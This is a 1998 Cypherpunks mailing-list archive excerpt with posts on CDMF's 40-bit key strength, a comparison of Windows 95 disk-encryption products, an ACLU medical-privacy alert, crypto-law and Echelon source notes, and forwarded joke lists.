In-Reply-To: <199803030324.EAA18619@basement.replay.com>
Message-ID: <3.0.5.32.19980302235528.008dc220@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Is CDMF secure?  and, What sort of algorithm is it?  Thanks.

CMDF is a version of DES watered down to 40-bit key strength.
I think IBM was to blame; it was designed for exportability.

It makes Louis Freeh feel secure, I guess, but it's not
useful for data that needs to be secure.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Tue, 3 Mar 1998 01:12:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Hard Drive Encryption Packages Comparison (Win 95)
Message-ID: <Pine.SUN.3.96.980303041251.2421C-100000@toastman.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Windows 95 Hard Drive Encryption Packages Comparison
        ----------------------------------------------------

  by Andrew Fabbro <afabbro@umich.edu> 
  3 March 1997

I've had several requests to post this to the cypherpunks list, and I'm
also posting it in the newsgroups where I originally asked for software
suggestions.  This list only compares FEATURES -- I have not done any
independent analysis of these products' claims and have not even tried
the evaluation copies of all of them.  This was originally just for my
own reference -- I've cleaned it up a bit but it isn't exhaustive, or
necessarily fair.

I'm sure there are other packages-- if you think I've left something
significant out, please let me know.  I'd also appreciate any
corrections or giggles at obvious errors in thought.

After getting some feedback/corrections, this will eventually be put on
the Web.

----------
DISCLAIMER
==========

I am just a Doc-Martens-and-earrings cypherpunk, not a security
consultant!  I am not a professional cryptologist, nor a Windows 95
expert.  You should NOT take my opinions at face value -- you should
evaluate these products yourself.  This list is just designed to give
you some starting points and save you some leg work.  Of course, I take
no responsibility, make nor warranties, blah blah...

----------------------------------------
INTRO: EXPLANATION OF LISTINGS AND TERMS
========================================

These packages all provide interface functionality beyond the simple
file-by-file encryption available with, say, PGP.  Either they provide
a drive interface or they allow you to designate a list of files which
are then transparently or automatically de/encrypted in some fashion.
If you have only a few files or anticipate only temporary or infrequent
de/encryption, then PGP or something similar would probably suffice.

I've separated this list into two categories using my own made-up
terms: Virtual Volume programs and File List programs.  VV programs
make a large file on your hard drive which is transparently available
to Win95 as a drive (similar to the way DriveSpace/DoubleSpace works).
Once you authenticate and mount the drive, everything else is
transparent.

With File List programs, you designate a list of files or folders that
you want encrypted.  The encryption package then en/decrypts these
either on-the-fly as you access them, or in bulk at boot-time/
shutdown-time.  Most offer individual file/folder manual operation as
well.  Unlike Virtual Volume programs, which pretty much all operate
the same way, there is a greater variation in interface with File List
programs, so evaluate closely before purchase.

In practice, the difference between Virtual Volume and File List
programs is not that great: you type your password once at login and
everything else is handled by the software.  The only difference is
that with File List programs, you have to designate files or folders,
which might be a more frequent task than designating a single drive.
On the other hand, all of your sensitive files may live in only a few
directories anyway, and File List programs let you place these
files/folders anywhere on your system, mingled in with non-encrypted
files.

There were a few packages which appear to operate in a truly manual
mode -- you decrypt before opening and then encrypt when you're
finished with the file (assuming you don't forget, or become lazy).  If
you're going to do this, just use PGP, which is likely already on your
system already, you little cypherpunk, you, and offers CAST, IDEA, and
Triple-DES.  Packages with manual-mode operation are under
"Manual-Operation Packages" at the end.  Norton is so vague about the
operation of "Your Eyes Only" on their web page that it is listed in
this section.

"Preview" refers to an evaluation copy-- if one is available for
download (be it crippleware or whatever), this field is marked Yes.

----------------
MY PERSONAL PICK
================

I'm still evaluating, but will likely settle on Kremlin.  Even though
virtual volumes seem easier to me, Kremlin has one must-have feature I
haven't found elsewhere: it addresses the Windows swapfile issue.
Windows' swapfile has raw hunks of memory swapped out to disk, which
which could contain anything from any open file.  These swapfiles are
not reliably deleted at shutdown-time, or in the event of a system
crash, and in any event Windows certainly doesn't securely (DoD-style)
delete them.  Some snooper with a boot disk, file recovery utility, and
hex editor could stop by and read previous memory images...talk about
data leakage.

None of these packages allow you to encrypt the swapfile while Windows
is running, but Kremlin's Sentry does the next best thing.  At
shutdown-time, it securely deletes the swapfile and other temp files,
wiping the drive DoD-style.  The fact that Kremlin's design was
obviously thought out from the perspective of an integrated platform
and took this issue into account gives me a warm fuzzy feeling.  Also,
Kremlin offers the most diverse array of algorithms and has some nice
extras, such as a secure Recycle Bin, which is easier to use than
having to remember to run a special secure delete command from the
context menu.  And it's only $35!

If I were administering a site-wide encryption program, I might choose
something that was designed for that environment and offered more
administrative options.  I've made notes on packages which address this
situation and its issues.

----------
SIDE NOTES
==========

BLOWFISH was specifically designed to be fast in software
implementations on 32-bit processors and would likely be the fastest
algorithm you can pick.  I've not noticed any lag when using
BLOWFISH-based systems on a 486-66 w/32MB RAM (hardly a fast machine).

Some publishers only specified a "Genuine RSA Encryption Engine,"
displaying a RSA-licensed logo.  This isn't snake oil, but I'd sure
like to know more about the crypto.

-----------------------
VIRTUAL VOLUME PACKAGES
=======================

Product      : BestCrypt
Manufacturer : Jetico, Inc.
Type         : Virtual Volume
Crypto       : BLOWFISH, GOST, DES
Features     : timeout close, hotkey close, secure delete
Cost         : $89.95
Preview?     : Yes - 30 day trial, after expiration, volume becomes read-only
Web          : http://www.jetico.sci.fi/np_new.htm
Notes        : Joel McNamara (Private Idaho's author) picks this for
	       his Cryptobook specification (see
	       http://www.eskimo.com/~joelm/cryptbk.html).  A
	       completely free and very well-designed DoD-spec file
	       deletion utility is available at Jetico web site, too,
	       as a separate freeware package (BCWipe - get it!)


Product      : SafeHouse
Manufacturer : PC Dynamics
Type         : Virtual Volume
Crypto       : BLOWFISH, FAST, DES/Triple DES
Features     : Configurable passwords/expirations, optional key recovery,
               C++ developer's toolkit available.
Cost         : $79.95
Preview?     : Yes - free trial version with 40-bit DES
Web          : http://www.pcdynamics.com/SafeHouse/
Notes        : key recovery is optional- you can choose to "brand" the
	       volume or not.


Product      : Private Disk (in beta)
Manufacturer : Private Data, Inc.
Type         : Virtual Volume
Crypto       : Not specified - "strong" versions for US/Canada
Features     : 
Cost         : not listed
Preview?     : Beta participation program
Web          : http://www.privatedata.com/
Notes        : I mention this only for die-hard cypherpunks who want
	       to try new toys and might be interested in beta
	       participation.


------------------
FILE LIST PACKAGES
==================

Product      : Kremlin
Manufacturer : Mach5
Type         : File List
Crypto       : CAST, IDEA, BLOWFISH, RC4, Safer SK-128, DES, and NewDES
Features     : Automatic Decrypt/Encrypt at Login/out, includes a secure
               text editor/e-mail package, secure Recycle Bin, Sentry
               program to automate swap/temp/other-file wiping.
Cost         : $35
Preview?     : Yes
Web          : http://www.mach5.com/kremlin/
Notes        : This is a very nice package and my personal pick -- see
	       my notes in the intro.


Product      : RSA SecurePC
Manufacturer : Security Dynamics, Inc.
Type         : File List 
Crypto       : RC4
Features     : Trustee threshold key recovery system, boot lock, screen lock,
               network support, password expiration/rule management
Cost         : Not listed, and I was too lazy to make a phone call to find out
Preview?     : Yes
Web          : http://www.securitydynamics.com/solutions/products/securpc.html
Notes        : The key-recovery system is very well-thought out and
	       involves trustee thresh-holds -- i.e., you can decide
	       that three (or seven or whatever) administrators'
	       signatures are necessary to recovery a key...prevents
	       malicious admins' snooping.  The admin support (for
	       site-wide usage) is also nice.  This product was
	       formerly published by RSA, who now licenses it to
	       Security Dynamics.  This looks like a very well-designed
	       package with many extras for group-use situations,
	       though more crypto options would be nice.


Product      : SecureWin
Manufacturer : Cipher Logics 
Type         : File List
Crypto       : RSA Public.  No further details were specified.
Features     : SecureWin is more of an integrated security environment
	       than just a hard drive encryptor -- it also includes
	       secure deletions, e-mail integration, a password keeper,
	       etc.  There is an extensive access-control facility.
	       Operates via a "secure Start menu," a taskbar add-on.
	       Network support.
Cost         : $29.95 
Preview?     : Yes - 30 day evaluation download.
Web          : http://www.securewin.com/ 
Notes        : Very well done from a user interface point of view and
	       has numerous cool add-ons.  I wish more information was
	       given on the crypto and its implementation.


Product      : F-Secure Desktop
Manufacturer : Data Fellows
Type         : File List 
Crypto       : Triple-DES ("168-bit"), BLOWFISH
Features     : 
Cost         : $99
Preview?     : No
Web          : http://www.datafellows.com/f-secure/desktop/
Notes        : Normally, you specify a set of folders/files to be
	       de/encrypted at login/out.  Alternatively, you can list
	       files as "Top Secret," which means you must manually
	       de/encrypt them via context menu.


Product      : DataGuard
Manufacturer : Secure Services Link, Ltd.
Type         : File List
Crypto       : IDEA, SEAL
Features     : extensive class-based access control, trustee-threshold
               key recovery system
Cost         : $69
Preview?     : No
Web          : http://www.sls.net/dataguard_v2.html
Notes        : The class-based access control lists appear to offer
	       highly configurable access control: classes of data
	       (e.g., workgroup or by sensitivity or whatever), with
	       access rights offered by right to select users.  You can
	       also set "minimum eyes" thresholds for groups-- e.g.,
	       all members or certain members must be present for
	       access to be given.  Encryption or decryption rights can
	       be separated.  This would be very nice for site-wide
	       situations, except...the basic package does not offer
	       network support.  "Pro" and "Net" packages which do are
	       slated for April '98 release.


-------------------------
MANUAL-OPERATION PACKAGES
=========================

Product      : SAFE Folder
Manufacturer : GlobeTech Catana
Type         : File List, Semi-Manual
Crypto       : BLOWFISH
Features     : 
Cost         : $58.75
Preview?     : Yes - password fixed to "DEMO"
Web          : http://www.globetech.se/safe/
Notes        : From the web page, I infer that you have to manually
	       de/encrypt files.  It can operate at a folder level,
	       which is at least some improvement over file-by-file
	       operation.  I didn't see any reason why this product
	       would be better than any of those listed above.


Product      : Your Eyes Only
Manufacturer : Norton (Symantec)
Type         : File List, Manual?
Crypto       : It uses a "Genuine RSA Encryption Engine".
Features     : boot-time lock, screen lock, uses context menu,
               network support
Cost         : $89.95
Preview?     : No
Web          : http://www.symantec.com/yeo/index_product.html	
Notes        : I couldn't tell if this operated in some sort of
	       transparent or automatic fashion like other file list
	       programs, or if you had to encrypt/decrypt each folder
	       manually.  A screen shot shows a user using a context
	       meny that has "Enable SmartLock Folder" and "Disable
	       SmartLock Folder," which implies some non-manual mode of
	       operation.  E-mail to Symantec asking for more
	       information (and details on their crypto) went
	       unanswered.  There is also an administrator's version of
	       this program.


Product      : Stealth Encryptor
Manufacturer : Tropical Software, Inc.
Type         : File List
Crypto       : BLOWFISH, DES ("64-bit")
Features     : installable crypto modules (via .DLL, development kit 
               available), secure delete, e-mail integration
Cost         : $34.95
Preview?     : Yes
Web          : http://www.tropsoft.com/stealth/
Notes        : This package's unique feature is its support for
	       drop-in crypto modules.  Theoretically you could write
	       your own .DLL with another crypto system of your choice
	       and Stealth Encryptor would integrate it.  If you have a
	       burning desire to do this, you might look into this.  SE
	       also features "Stealth Media Encryption" which is "super
	       speed" for image files, executables, etc...presumably
	       with weaker crypto.


Product      : SecureStore 
Manufacturer : Selom Ofori
Type         : Manual
Crypto       : BLOWFISH, DES/Triple-DES, CAST, RC4, Diamond2 
Features     : 
Cost         : $30
Preview?     : Yes
Web          : http://www.freeyellow.com/members/renegade/
Notes        : SecureStore creates archives into which you can
	       place files.  From what I saw on their web site, to
	       access aid files, you have to pull them out of the
	       archive again.  While the screen shots show some nice
	       displays (e.g., which crypto used, compression ratio,
	       etc.), this mode of operation does not appeal to me.


Product      : Pretty Good Privacy (PGP)
Manufacturer : PGP, Inc. (well, Network Associates now, I guess)
Type         : Manual
Crypto       : CAST, IDEA, Triple-DES
Features     : Too many to list.
Cost         : Free
Preview?     : Yes
Web          : http://www.pgp.com/
Notes        : Listed just for the sake of completeness.  And it's
	       not at all bad for manual encrypt/decrypt -- version 5.5
	       has a nice toolbar and tray interface.  But you'll want
	       it for all the other messaging features anyway...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 2 Mar 1998 19:26:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Is CDMF secure?
Message-ID: <199803030324.EAA18619@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Is CDMF secure? and,
What sort of algorithm is it?
Thanks.

        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike <blazer@mail.nevalink.ru>
Date: Mon, 2 Mar 1998 21:13:37 -0800 (PST)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Newbie pgp question
In-Reply-To: <3.0.5.32.19980302002230.0092c210@popd.ix.netcom.com>
Message-ID: <34FB90E2.F5F@mail.nevalink.ru>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
Thanks Bill for very good explanation.

> *I assume you're not the KGB or Mafia, because then you would just
> beat up the guy until he gives you the passphrase.

O-o! You are well informed in what is going on! The "guy" is in fact
pretty girl - one man's secretary, so those methods are not for this
case. But may be I'd better brute force her instead of her secring? :)
-- 

*******************************************
Mike Blazer
blazer@mail.nevalink.ru
*******************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JWRCLUM <JWRCLUM@aol.com>
Date: Tue, 3 Mar 1998 06:24:12 -0800 (PST)
Subject: Medical Privacy Alert
Message-ID: <d2873b24.34fc1267@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


AMERICAN CIVIL LIBERTIES UNION OF MASSACHUSETTS
99 Chauncy Street, Suite 310, Boston, MA 02111
(617) 482-3170  Fax (617) 451-000


CONTACT:	John Roberts
(617) 482-3170     http://users.aol.com/mcluf/home.html

BENNETT-JEFFORDS BILL PLACES MEDICAL RECORD PRIVACY AT RISK

	The confidentiality of the doctor-patient relationship will be totally
undermined as medical records become widely available without patient
knowledge or consent.	

	BOSTON - February 27, 1998.   On Thursday 2/26/98 the United State Senate's
Labor and Human Resources Committee heard testimony concerning a bill proposed
by Senators Bennett and Jeffords that, if passed, would license the widespread
disclosure of personal medical information contained in files held by doctors,
hospitals, employers, educational institutions, and others.
	The bill which purports to be a privacy bill is, in fact, just the opposite.
It places virtually no restrictions on the disclosure of personal medical
records within health care entities (no matter how large and geographically
widespread) or to a long list of other entities and agencies including the
following:  
	-  any agents or contractors of the health care entities 
	-  Public Health Agencies, Oversight Agencies
	-  Health Care Accreditation Agencies
	-  State Health Care Databases

There are major loopholes in access provisions for
	-  Health Care Researchers
	-  "Outcome" analysts ("cost/benefit" analysts for hospitals, HMO's,
insurers, etc)
	
	Even law enforcement agencies will have easy access to browse computerized
medical record systems for so-called "legitimate" investigatory purposes.
This will make every American's medical record part of a new massive law
enforcement database.
	The bill will destroy the confidential "doctor-patient relationship" and
replace it with a new "patient-health care industry relationship."
	"This bill serves only the interests of the burgeoning health care industry,"
said John Roberts, Executive Director of the ACLU of Massachusetts.  "It
allows the transfer of your medical records to many entities that stand to
profit from its information.  Gone is doctor-patient confidentiality.  Your
doctor cannot protect your most sensitive medical information from many
entities outside your medical facility.  Even employers who have health plans
are considered 'health care providers' in the Bennett-Jeffords bill.  How many
of us want our employers to have access to any of our medical records without
our knowledge or consent?"  
	The bill will also
	-  Impose requirements that patients sign blanket consent forms for release
of information as a condition of getting treatment, even for self-pay patients
	- Redefine "treatment" to make the patient's record a subject of continuous
research
	- Blur the boundaries between individual patient care and the so-called
"Population Management" and "Disease System Management"
	The bill will pre-empt all state laws which may be more protective of the
confidentiality of medical records.
	The bill will not apply even its own minimal privacy protections to so-called
"non-identifiable" medical records information.  But...interestingly, the bill
also refers to issuing "keys" to re-identify previously purportedly "non-
identified" information.  A formal logical analysis of this reveals that the
bill itself admits that what it calls "nonidentifiable" medical record
information is actually identifiable (i.e. containing patient information).
	The ACLU of Massachusetts believes that what is really needed for medical
privacy protection would be the following:
	-  Federal law should set a foundation or floor of privacy protection
	-  State laws which are more-protective of patient's rights should not be
preempted 
	-  No "Unique Patient Identification Numbers"
	-  No electronic "linkage" of patient records stored in various sites
	-  Computerized patient records must be encrypted with keys provided only to
those directly involved in the individual patient care
	-  The right of the individual patient to contract directly with physicians
and health care providers regarding the privacy of the patient's medical
records.

	-end-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 3 Mar 1998 11:38:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Radio Frequency Warfare Hearing
In-Reply-To: <1.5.4.32.19980228131755.00718780@pop.pipeline.com>
Message-ID: <3.0.5.32.19980303110231.007f1270@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:56 PM 3/2/98 -0800, bill.stewart@pobox.com wrote:
>At 08:17 AM 2/28/98 -0500, John Young wrote:
>>We offer the lengthy prepared testimony at the Joint 
>>Economic Committee hearing February 25 on "Radio Frequency 
>>Weapons and Proliferation: Potential Impact on the Economy."
>>  http://jya.com/rfw-jec.htm  (112K)
>
>John!  You can't do that!  That's putting bomb-making information
>on the Internet!  

Its not bomb-making, its destructive testing apparatus :-)

>On a slightly more serious note, I'm surprised from the
>excerpts of the description that the $500 of parts would
>generate enough joules of electrical energy induced into
>sensitive parts of computer equipment in some reasonable range
>to do a lot of damage.

Wasn't he talking about EMI, not actual frying of chips (e.g.,
puncturing the 100's-of-nm-thick gate oxides in MOS)?
I read only the excerpt, but isn't a spark gap used for 
generating a broad spectrum, including fairly high
frequencies (think tesla coil)?  

Digital circuits don't like transients in their signals.
High frequency RF is invasive.
Capacitors are cheap.



------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"Moderation in temper is always a virtue; but moderation in principle is
always a vice." ---Thomas Paine







	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Tue, 3 Mar 1998 02:18:28 -0800 (PST)
To: krypto@rhein-main.de
Subject: Crypto Law Survey updated
Message-ID: <62D6BE0479@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


I have just updated my survey of existing and envisaged cryptography
laws and regulations. See the Crypto Law Survey at
http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm

This update includes:
-update on European Union (ETSI on TTP; Eckhert statement; 
     COM (97) 503 "not important"; Birmingham conference), 
     Council of Europe (PC-CY), Belgium (law amended),
     Canada (crypto policy discussion paper), France (Lorentz report),
     Gemany (Sandl statement; no backdoor in Pluto), Israel (export
     revision), Netherlands (proposals to extend decryption command;
     TTP project; encrypt to "seize"; use remains free), Scandinavia
     (PSS no longer Nordic), United Kingdom (policy announcement
     delayed; SfL resolution), United States (interim export rule;
     California resolution; czar travels; Compsec Enhancement Act;
     Kerrey McCain revised; AES conference) 
-corrections on Estonia (controls were reported), Switzerland (telecom > radio)
-clarification on Wassenaar Arrangement (General Software Note),
     Germany (export), Israel (case-by-case decisions), Sweden
     (Internet export), US (SAFE versions) 
-URL added to Canada (gov PKI), Hong Kong (export)

Kind regards,
Bert-Jaap

---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law, Administration and      facs    +31 13 466 8149
Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Camp <b093161c@bc.seflin.org>
Date: Tue, 3 Mar 1998 09:08:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.3.89.9803031226.A17784-0100000@bc.seflin.org.>
MIME-Version: 1.0
Content-Type: text/plain



help b093161c@bc.seflin.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Mar 1998 11:58:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Original Sources for Echelon
Message-ID: <1.5.4.32.19980303200229.010ba928@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Campbell has posted the message below on Echelon. 
Would anyone happen to have a copy of the 1988 New Statesman
article? If not, I'll dig it out of a library. More importantly, as 
Duncan asks, does anyone know of other original info on Echelon?

----------

Date: Mon, 02 Mar 1998 23:35:59
To: ukcrypto@maillist.ox.ac.uk
From: Duncan Campbell <duncan@gn.apc.org>
Subject: Original sources regarding the ECHELON sigint network

>>The New York times has recently run a story regarding a "telecommunications
>>interception network" operating in Europe.
>>My recollection is that news broke about this some time last year, thanks
>>to revelations in New Zealand. Sorry, I don't have a good reference to
>> hand.


The original and primary source for information on ECHELON is an article I
wrote in New Statesman magazine ten years ago : NS, 12 August 1988 :
"They've got it taped".  

In 1991, a UK World in Action programme added an important new detail about
the network, namely the presence of a DICTIONARY computer (a key part of
the system) at  GCHQ's processing centre in Westminster.  

In 1993, I produced a documentary for Channel 4 - "The Hill" which related
ECHELON to the work of the Menwith Hill NSA field station near Harrogate in
Yorkshire.  

In 1996, Nicky Hager in New Zealand described in his book "Secret Power"
the presence of DICTIONARY computers at two New Zealand sigint stations,
and gave extensive details of the local programming and tasking of the
ECHELON "dictionaries".  

Apart from these sources, so far as I am aware all the reports that are
around are derivative and reprocessed.  The European Parliament STOA
committee report from the "Omega Foundation" is in this category and was in
fact submitted rather more than a year ago.  If anyone is aware of any
other *original* publication on this topic, could they post it. The arrival
in the public domain of original information in this area is a rarity, yet
is the foundation for the only things we "know" about the scale of NSA/GCHQ
surveillance and processing. 

Duncan Campbell 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perrin ." <pleontks@hotmail.com>
Date: Tue, 3 Mar 1998 17:08:01 -0800 (PST)
To: Yankee1428@aol.com
Subject: Fwd: Thoughts
Message-ID: <19980304010725.7222.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Not So Deep Thoughts

Should vegetarians eat animal crackers?
If at first you don't succeed, skydiving is not for you.
The pen is mightier than the sword -- if the sword is very small and the
pen is real sharp.
If  you throw a cat out a car window, does it become kitty litter?
Call me insane one more time and I'll eat your other eye!
I didn't fight my way to the top of the food chain to be a vegetarian.
When it rains, why don't sheep shrink?
The two biggest problems in America are making ends meet and making
meetings end.
Stupidity got us into this mess.  Why can't it get us out?
The trouble with doing nothing is that you never know when you are
finished.
Money isn't everything, but at least it encourages relatives to stay in
touch.
If a stealth bomber crashes in a forest, does it make a sound?
A single fact can spoil a good argument.
Growing old is mandatory, but growing up is optional.
I do whatever my Rice Krispies tell me to.
Why do we sing "Take me out to the ball game" when we're already there?

----------------
fixed by Perrin
pleontks@hotmail.com
http://members.tripod.com/~pleontks
http://www.angelfire.com/az/69frank69

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perrin ." <pleontks@hotmail.com>
Date: Tue, 3 Mar 1998 17:22:57 -0800 (PST)
To: Yankee1428@aol.com
Subject: Fwd: Taglines
Message-ID: <19980304012223.18225.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



   ***    Some Funny Taglines    *****

2 rules to success in life. 1. Don't tell people everything you know.
A good pun is its own reword.
A penny for your thoughts; $20 to act them out.
After silence, music comes closest to expressing the inexpressible.
Alcoholic:  Someone you don't like who drinks as much as you do.
All things are possible, except skiing through a revolving door.
Any man who can see through women is sure missing a lot.
Apathy Error:  Don't bother striking any key.
Blessed are the censors; they shall inhibit the earth.
Budget: A method for going broke methodically.
Can you think of another word for "synonym"?
Circle:  A line that meets its other end without ending.
Civilized people need love for full sexual satisfaction.
Cole's Law: Thinly sliced cabbage.
Conscience is what hurts when everything else feels good.
Consider what might be fertilizing the greener grass across the fence.
Death and taxes are inevitable; at least death doesn't get worse every =
year.
Defeat is worse than death because you have to live with defeat.
Despite the high cost of living, it remains popular.
Does Time pass? Yes, it does. How else can you explain Visa bills?
Don't use no double negatives, not never.
Don't sweat the petty things, just pet the sweaty things.
Don't eat the yellow snow.
Down with categorical imperatives.
Either I'm dead or my watch has stopped. =20
Electricity comes from electrons; morality comes from morons.
Everything in moderation, including moderation.
Familiarity breeds children.
Fast, Cheap, Good:  Choose any two.
Fools rush in -- and get the best seats in the house.
Give me chastity and continence, but not just now.  -- St. Augustine
Have an adequate day.
He has the heart of a little child...  it's in a jar on his desk.
He who dies with the most toys is nonetheless dead.
He who laughs last didn't get the joke.
Honesty is the best policy, but insanity is a better defense.
Horse sense is the thing a horse has that keeps it from betting on =
people.
Hospitality:  Making your guests feel at home, even though you wish they 
=
were.
How come wrong numbers are never busy?
I bet you have never seen a plumber bite his nails.
I do a lot of thinking in the john. Says a lot for my thoughts.
I have had a perfectly wonderful evening.  But this wasn't it.  -- =
Groucho Marx
I have seen the future and it is just like the present, only longer.  -- 
=
Albran
I like work; it fascinates me.  I can sit and look at it for hours.
I may not be the world's greatest lover, but number seven's not bad.  -- 
=
Allen
I never forget a face, but in your case I'll make an exception.  -- Marx 
=
I
will meet you at the corner of Walk and Don't Walk.
I never made a mistake in my life.  I thought I did once, but I was =
wrong.
I used to be lost in the shuffle.  Now I just shuffle along with the =
lost.
I want to die in my sleep like my father, not screaming like his =
passengers.
I will always love the false image I had of you.
I would give my right arm to be ambidextrous.
I would like to help you out.  Which way did you come in?
If at first you don't succeed, destroy all evidence that you tried.
If at first you don't succeed, you probably didn't really care anyway.
If at first you do succeed, try to hide your astonishment.
If it wasn't for muscle spasms, I wouldn't get any exercise at all.
If it were truly the thought that counted, more women would be pregnant.
If there is no God, who pops up the next Kleenex?  -- Art Hoppe
If time heals all wounds, how come bellybuttons don't fill in?
If today is the first day of the rest of your life, what was yesterday?
Illiterate?  Write for free help.
In order to get a loan you must first prove you don't need it.
It doesn't matter whether you win or lose -- until you lose.
It is a miracle that curiosity survives formal education.  -- Albert =
Einstein
It is better to have loved and lost than just to have lost.
It is not an optical illusion, it just looks like one.  -- Phil White=20
It was a brave man that ate the first oyster.
I'll procrastinate...tomorrow.
I'll race you to China.  You can have a head start.  Ready, set, GO!
Keep a very firm grasp on reality, so you can strangle it at any time.
Keep stress out of your life.  Give it to others instead.
Knocked; you weren't in.  -- Opportunity=20
Know what I hate most?  Rhetorical questions.  -- Henry Camp=20
Laugh at your problems; everybody else does.
Laugh, and the world ignores you.  Crying doesn't help either.
Lead me not into temptation.  I can find it myself.
Life is like a fountain...  I will tell you how when I figure it out.
Life is like an analogy.
Make a firm decision now...  you can always change it later.
Male zebras have white stripes, but female zebras have black stripes.
May you die in bed at 95, shot by a jealous spouse.
Money DOES talk -- it says good-bye.
Most of us hate to see a poor loser. Rich winners, though, are worse.
Mr. Bullfrog sez:  Time is fun when you're having flies.
My name is Annie Key. Ouch! Why are you hitting me?!
My mother is a travel agent for guilt trips.
My opinions might have changed, but not the fact that I am right.
Never deprive someone of hope; it may be all they have.
Never put off till tomorrow what you can ignore entirely.
Never forget: 2 + 2 =3D 5 for extremely large values of 2.
Never hit a man with glasses.  Use your fist.
Next time you wave at me, use more than one finger, please.
No prizes for predicting rain.  Prizes only awarded for building arks.
Nobody ever goes there, it's too crowded. (I've actually HEARD this!)=20
Nothing cures insomnia like the realization that it is time to get up.
One good turn usually gets most of the blanket.
Our policy is, when in doubt, do the right thing.  -- Roy Ash=20
Out of the mouths of babes does often come cereal.
People who think they know everything greatly annoy those of us who do.
Politics: n. from Greek; "poli" - many; "tics" - ugly, bloodsucking =
parasites.
Quidquid latine dictum sit, altum viditur.  (Anything in Latin sounds =
profound.)
Radioactive cats have 18 half-lives.
Some people would not recognize subtlety if it hit them on the head.
Someday you will get your big chance -- or have you already had it?
Sometimes you're the bug, and sometimes you're the windshield.
Sometimes a cigar is just a cigar.  -- Sigmund Freud=20
Stealing a rhinoceros should not be attempted lightly.
That was Zen; this is Tao.
The generation of random numbers is too important to be left to chance.
The trouble with political jokes is that they get elected.
The secret of success is sincerity.  Once you can fake that, you have it 
=
made.
The death rate on Earth is: .... (computing) .... One per person.
The most enjoyable form of sex education is the Braille method.
The number watching you is proportional to the stupidity of your action.
The trouble with being punctual is that no one is there to appreciate =
it.
There are 3 kinds of people: Those who can count and those who can't.
There must be more to life than sitting wondering if there is more to =
life.
They laughed when I said I'd be a comedian. They aren't laughing now.
This aphorism would be seven words long if it were six words shorter.
This will be a memorable month -- no matter how hard you try to forget =
it.
This is the sort of English up with which I will not put.  -- Winston =
Churchill
This sentence contradicts itself: no, wait, actually it doesn't.
To err is human.  To admit it is a blunder.
To err is human.  To blame someone else for your errors is even more =
human.
Toe:  A part of the foot used to find furniture in the dark.  -- Rilla =
May=20
Two wrongs don't make a right, but three lefts do.
Under capitalism, man exploits man.  Under communism, it is just the =
opposite.
We aren't sure how clouds form.  But they know, that is what counts.
What is mind?  No matter.  What is matter?  Never mind.  -- Thomas 
Key=20
What if there were no hypothetical situations? --Andrew Kohlsmith=20
When you are in it up to your ears, keep your mouth shut.
When professors want your opinion, they'll give it to you.
Where there is a will, there is an Inheritance Tax.
Why don't "minimalists" find a shorter name for themselves?
Why is "abbreviated" such a long word?
Why take life seriously? You're not coming out of it alive anyway!
Why isn't "phonetic" spelled the way it's said?
Winning isn't everything, but losing isn't anything.
You simply *must* stop taking other people's advice.
You can fool some of the people some of the time, and that is =
sufficient.
You have the capacity to learn from mistakes.  You will learn a lot =
today.
Your lucky number is 364958674928.  Watch for it everywhere.

----------
fixed by Perrin
pleontks@hotmail.com
http://members.tripod.com/~pleontks
http://www.angelfire.com/az/69frank69

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 3 Mar 1998 23:32:30 -0800 (PST)
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Is CDMF secure?
In-Reply-To: <199803030324.EAA18619@basement.replay.com>
Message-ID: <v0311070fb122977548d9@[207.94.249.79]>
MIME-Version: 1.0
Content-Type: text/plain


